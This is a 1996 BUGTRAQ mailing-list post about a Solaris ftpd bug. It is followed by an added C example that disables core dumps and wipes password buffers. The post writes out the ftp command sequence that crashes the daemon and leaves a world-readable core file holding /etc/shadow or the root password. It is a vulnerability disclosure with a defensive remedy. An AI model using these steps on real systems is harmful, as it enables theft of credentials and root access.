
Re: ftpd bug? Was: bin/1805: Bug in ftpd

daemon@ATHENA.MIT.EDU (James Poland 6-5251)
Wed Oct 16 22:52:07 1996

Date: 	Wed, 16 Oct 1996 08:52:57 -0400
Reply-To: James Poland 6-5251 <poland@cam2.gsfc.nasa.gov>
From: James Poland 6-5251 <poland@cam2.gsfc.nasa.gov>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>

Martin's method works for Solaris 2.5.1 as well. 'strings' on the core file
reveals the complete contents of /etc/shadow. This is not good. To reiterate,
if someone else is running an ftp session on host_a, start your own ftp
session with host_a. Then issue the commands
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

Examine the resulting core file with the strings command.

This method does not work with Solaris 2.4.

>
> James Poland 6-5251 wrote:
> >
> > On Solaris 2.5.1, the core file contains only the user's password in
> > cleartext. How hard is it to crash someone else's ftp session?
>
> Killing from the command line doesn't seem to work, but:
>
> SunOS 5.5:
>
> logon via ftp with your regular user/password,
> ftp> cd /tmp
> ftp> user root wrongpasswd
> ftp> quote pasv
>
> voila, root password in world readable core dump under /tmp
>
> -Martin
>
> PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
>     so they seem to have used the proposed fix
>
>          Checking for "pw != NULL"
>
>     So this proposal was simple and obvious   ... and incomplete. :)
>

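A defensive pattern for the class of bug discussed in this thread (credentials left in process memory and then written to a world-readable core file), as an added C example that is not code from Sun's ftpd or from anyone in the thread; check_password and the credential strings are constructed stand-ins, and the real fix for the daemon still needs the NULL check and a crash-free PASV path:

```c
#include <string.h>
#include <sys/resource.h>

/* Disable core files for this process; 0 on success, -1 on failure. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };
    return setrlimit(RLIMIT_CORE, &rl);
}

/* Current soft core-file limit, so a caller can verify the guard took. */
long core_limit(void)
{
    struct rlimit rl;
    return getrlimit(RLIMIT_CORE, &rl) == 0 ? (long)rl.rlim_cur : -1;
}

/* Overwrite a secret through a volatile pointer so the store is not dropped. */
void scrub(void *buf, size_t len)
{
    volatile unsigned char *p = (volatile unsigned char *)buf;
    while (len--)
        *p++ = 0;
}

/* Constructed stand-in for the authentication step (not ftpd's code): the
 * stored credential is copied to the stack only for the comparison, and both
 * the copy and the supplied password are wiped before returning. */
int check_password(const char *stored, char *supplied)
{
    char copy[64];
    size_t n = strlen(stored);
    int ok = 0;
    if (n < sizeof copy) {
        memcpy(copy, stored, n + 1);
        ok = (strcmp(copy, supplied) == 0);
    }
    scrub(copy, sizeof copy);
    scrub(supplied, strlen(supplied));
    return ok;
}

/* Failed-login walk-through on constructed values: returns 1 when the login
 * is rejected, the password buffer is wiped and core dumps are off. */
int demo_failed_login(void)
{
    char supplied[] = "wrongpasswd";
    int ok = check_password("correct-horse", supplied);
    return !ok && supplied[0] == '\0' && disable_core_dumps() == 0 && core_limit() == 0;
}
```

With the limit at 0, a later crash (such as the one triggered by "quote pasv" here) produces no file under /tmp for anyone to run strings on, and the scrubbed buffers would be empty even if it did.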